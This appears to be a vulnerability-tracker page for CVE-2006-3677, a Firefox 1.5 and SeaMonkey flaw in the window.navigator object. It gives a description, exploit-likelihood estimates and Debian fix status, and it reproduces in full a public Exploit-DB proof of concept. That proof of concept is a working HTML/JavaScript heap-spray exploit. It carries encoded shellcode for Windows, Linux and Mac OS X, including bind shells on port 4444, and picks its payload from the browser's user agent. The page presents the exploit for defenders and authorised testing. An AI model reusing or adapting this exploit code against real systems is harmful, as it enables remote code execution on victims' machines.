CVE-2006-3677

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

Mozilla Firefox 1.5 before 1.5.0.5 and SeaMonkey before 1.0.3 allows remote attackers to execute arbitrary code by changing certain properties of the window navigator object (window.navigator) that are accessed when Java starts up, which causes a crash that leads to code execution.

Predictions

Exploit likelihood

90%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-2082 remote multiple verified text · 5 KB

H D Moore · 2006-07-28

Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution

text exploit Source: Exploit-DB

<!--
Firefox <= 1.5.0.4 Javascript navigator Object Code Execution PoC 
http://browserfun.blogspot.com/

The following bug (mfsa2006-45) was tested on the Firefox 1.5.0.4 running 
on Windows 2000 SP4, Windows XP SP4, and a recently updated Gentoo Linux system. 
This bug was reported by TippingPoint and fixed in the latest 1.5.0.5 release of 
Mozilla Firefox. This is different from the bug I reported (mfsa2006-48) and is 
trivial to turn into a working exploit. The demonstration link below will attempt 
to launch "calc.exe" on Windows systems and "touch /tmp/METASPLOIT" on Linux systems.

window.navigator = (0x01020304 / 2);
java.lang.reflect.Runtime.newInstance( java.lang.Class.forName("java.lang.Runtime"), 0);

-->

<html><body><script>

// MoBB Demonstration
function Demo() {

	// Exploit for http://www.mozilla.org/security/announce/2006/mfsa2006-45.html
	// https://bugzilla.mozilla.org/show_bug.cgi?id=342267
	// CVE-2006-3677

	// The Java plugin is required for this to work

	// win32 = calc.exe
	var shellcode_win32 = unescape('%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065');
	var fill_win32 = unescape('%u0800');
	var addr_win32 = 0x08000800;
	
	// linux = touch /tmp/METASPLOIT (unreliable)
	var shellcode_linux = unescape('%u0b6a%u9958%u6652%u2d68%u8963%u68e7%u732f%u0068%u2f68%u6962%u896e%u52e3%u16e8%u0000%u7400%u756f%u6863%u2f20%u6d74%u2f70%u454d%u4154%u5053%u4f4c%u5449%u5700%u8953%ucde1%u8080');
	var fill_linux = unescape('%ua8a8');
	var addr_linux = -0x58000000; // Integer wrap: 0xa8000000

	// mac os x ppc = bind a shell to 4444
	var shellcode_macppc = unescape('%u3860%u0002%u3880%u0001%u38a0%u0006%u3800%u0061%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u4800%u000d%u0002%u115c%u0000%u0000%u7c88%u02a6%u38a0%u0010%u3800%u0068%u7fc3%uf378%u4400%u0002%u7c00%u0278%u3800%u006a%u7fc3%uf378%u4400%u0002%u7c00%u0278%u7fc3%uf378%u3800%u001e%u3880%u0010%u9081%uffe8%u38a1%uffe8%u3881%ufff0%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u38a0%u0002%u3800%u005a%u7fc3%uf378%u7ca4%u2b78%u4400%u0002%u7c00%u0278%u38a5%uffff%u2c05%uffff%u4082%uffe5%u3800%u0042%u4400%u0002%u7c00%u0278%u7ca5%u2a79%u4082%ufffd%u7c68%u02a6%u3863%u0028%u9061%ufff8%u90a1%ufffc%u3881%ufff8%u3800%u003b%u7c00%u04ac%u4400%u0002%u7c00%u0278%u7fe0%u0008%u2f62%u696e%u2f63%u7368%u0000%u0000');
	var fill_macppc = unescape('%u0c0c');
	var addr_macppc = 0x0c000000;
	
	// mac os x intel = bind a shell to 4444
	// Thanks to nemo[at]felinemenace.org for shellcode
	// Thanks to Todd Manning for the target information and testing
	var shellcode_macx86 = unescape('%u426a%ucd58%u6a80%u5861%u5299%u1068%u1102%u895c%u52e1%u5242%u5242%u106a%u80cd%u9399%u5351%u6a52%u5868%u80cd%u6ab0%u80cd%u5352%ub052%ucd1e%u9780%u026a%u6a59%u585a%u5751%ucd51%u4980%u890f%ufff1%uffff%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5353%u3bb0%u80cd');
	var fill_macx86 = unescape('%u1c1c');
	var addr_macx86 = 0x1c000000;		


	// Start the browser detection
	var shellcode;
	var addr;
	var fill;
	var ua = '' + navigator.userAgent;

	if (ua.indexOf('Linux') != -1) {
		alert('Trying to create /tmp/METASPLOIT');
		shellcode = shellcode_linux;
		addr = addr_linux;
		fill = fill_linux;
	}
	
	if (ua.indexOf('Windows') != -1) {
		alert('Trying to launch Calculator');	
		shellcode = shellcode_win32;
		addr = addr_win32;
		fill = fill_win32;
	}	

	if (ua.indexOf('PPC Mac OS') != -1) {
		alert('Trying to bind a shell to 4444');
		shellcode = shellcode_macppc;
		addr = addr_macppc;
		fill = fill_macppc;
	}	
	
	if (ua.indexOf('Intel Mac OS') != -1) {
		alert('Trying to bind a shell to 4444');
		shellcode = shellcode_macx86;
		addr = addr_macx86;
		fill = fill_macx86;
	}
			
	if (! shellcode) {
		alert('OS not supported, only attempting a crash!');
		shellcode = unescape('%ucccc');
		fill = unescape('%ucccc');
		addr = 0x02020202;
	}
		
	var b = fill;
	while (b.length <= 0x400000) b+=b;

	var c = new Array();
	for (var i =0; i<36; i++) {
		c[i] = 
			b.substring(0,  0x100000 - shellcode.length) + shellcode +
			b.substring(0,  0x100000 - shellcode.length) + shellcode + 
			b.substring(0,  0x100000 - shellcode.length) + shellcode + 
			b.substring(0,  0x100000 - shellcode.length) + shellcode;
	}
			
	
	if (window.navigator.javaEnabled) {
		window.navigator = (addr / 2);
		try {
			java.lang.reflect.Runtime.newInstance(
				java.lang.Class.forName("java.lang.Runtime"), 0
			);
			alert('Patched!');
		}catch(e){
			alert('No Java plugin installed!');
		}
	}
}

</script>

Clicking the button below may crash your browser!<br><br>
<input type='button' onClick='Demo()' value='Start Demo!'>


</body></html>

# milw0rm.com [2006-07-28]

EDB-16300 remote multiple verified

Metasploit · 2010-09-20

Mozilla Suite/Firefox - Navigator Object Code Execution (Metasploit)

Source code queued for fetch — refresh in a moment.

EDB-9946 remote multiple verified

H D Moore · 2006-07-25

Mozilla Suite/Firefox < 1.5.0.5 - Navigator Object Code Execution (Metasploit)

Source code queued for fetch — refresh in a moment.

Metasploit modules

exploit_multi/browser/mozilla_navigatorjava rank 300

Mozilla Suite/Firefox Navigator Object Code Execution

Source fetch failed: fetch_error — view the original via the link above.

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`0`
sid	Fixed	`1.5.dfsg+1.5.0.5-1`
forky	Fixed	`0`
bullseye	Fixed	`0`
bookworm	Fixed	`0`

References

https://security-tracker.debian.org/tracker/CVE-2006-3677

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.